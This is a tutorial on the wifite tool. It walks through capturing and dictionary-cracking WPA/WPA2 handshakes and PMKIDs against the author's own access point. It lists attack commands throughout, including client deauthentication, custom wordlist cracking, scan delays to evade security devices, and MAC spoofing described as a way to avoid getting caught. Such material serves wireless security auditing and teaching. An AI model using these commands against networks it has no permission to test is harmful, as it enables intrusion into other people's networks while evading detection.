WPA/WPA2 Handshake Capture
We have talked about handshakes in detail in our previous article . Let’s see how we can capture handshakes using wifite.
Here, we’ll simply type in the name of the tool since the default function is to scan the networks.
But we’ll add the –skip-crack option here which will stop the tool to crack any handshake that it captures
wifite --skip-crack
How tool works – As you might have observed in the screenshot that the tool is automatically trying all the attacks against a specified target. Here, I specified target “1” for my AP (”raaj”) and you can see that it has tried for PMKID attack first, been unsuccessful and then launched handshake capture. This process will be the same for any target. The tool will automatically determine which attack works. Quite simple and hassle-free!
Here, we have successfully captured a handshake and saved it in a location: /root/hs/<name>.cap
Now, if we don’t use the skip-crack flag along with the command, the chain would look something like this:
wifite
Target: 1
Chain:
- Identify APs
- Check protocol
- Attempt PMKID attack
- Attempt handshake attack
- If handshake found -> crack
And very evidently so, you can see that it has cracked the handshake file and given out the password as “raj12345”
It uses aircrack-ng’s dictionary attack module in the background.
Some useful options
Filtering Attacks: What if I want to skip out the PMKID step from the chain above? We can do this by:wifite --no-pmkid
Scan Delay: Another useful option is to give a scan time delay. This may be used in parallel to other options to evade security devices that have set a timeout for unauthenticated packets.
wifite -p 10
Here, the tool will put a delay of 10 seconds before attacking the targets
And now the tool is putting a delay of 10 seconds after every target
PMKID timeout: This flag would enable us to set a timeout delay between each successful RSN packet request to the access point
wifite --pmkid-timeout 130
Observe how there is a timeout of 130 seconds. I’ve been interrupted before 130 seconds by C TRL+C to stop the attack. Note how it says ”waiting for PMKID (1m 23s)”
Stop deauthentication on a particular ESSID: This flag will stop the tool from conducting client deauthentication (often used in handshake captures). In a list of targets I want to stop preventing my tool to conduct deauthentication, this would yield useful
wifite -e raaj --nodeauths
-e : ESSID (name of AP)
Targeting only WPA networks: This flag helps us identify WPA only and attack the targets
wifite --wpa
Ignore present handshakes: Oftentimes we want a fresh start or our handshakes are just not behaving the way we want. For those times, we have a handy feature of ignoring the existing handshakes and capturing rather fresh or new ones.
wifite --new-hs
Supplying custom dictionary: For our dictionary attacks, if we want to supply a custom wordlist we can do that within the tool’s interface too. This is done by the “dict” flag
wifite --dict /root/dict.txt
Now, setting the target as above, we see that dictionary infact works
Display cracked APs: To display a complete list of already cracked targets fetched from the tool’s database, we have the command:
wifite --cracked
Validating handshakes: Now, if we want to verify the existing handshakes that we have already captured against a wide variety of Wireless Auditing tools we can do so by:
wifite --check
Great, now I can proceed with tshark now!
Cracking handshake file: The list of handshake files we have captured is with us now. What if I want to modify the cracking tool and not use the default one. It can be done using:
wifite --cracked
Choose target and tool afterwards
And as you can see that aircrack has cracked password “raj12345”
Killing conflicting processes: This flag helps us kill all the jobs that may conflict with the working of the tool. It’s a great little cleanup technique before starting the tool
wifite --kill
MAC Spoofing: MAC Address spoofing is a great technique to evade analyst’s vision and avoid getting caught by supplying the real MAC ID of your Wi-Fi adapter. First, we see our wifi card’s MAC ID by ifconfig
Note this MAC ID ends in 5C. That’s all we need to visualize if MAC is being spoofed or not.
Now we spoof this MAC ID by wifite command:
wifite --random-mac
Observe how this new MAC ID ends in 09. This means that spoofing has been done successfully and a random MAC has been put on the interface.
Now, after our job is done, this option will automatically reset the MAC ID too. Very efficient.
Power filter: Access Points that are far away often don’t behave well while being attacked. There’s a lot of noise, attenuated signals and obviously packet drops while communicating. So to be safe we’ll set a power threshold so that we can only scan WiFis closer to us and whose power is enough to be communicated with without any errors like in WiFis that are attenuated.
Note that this value is in decibels. Let’s set a threshold of 35db.
wifite --power 35
Now only the APs with 35db or more strength will be visible.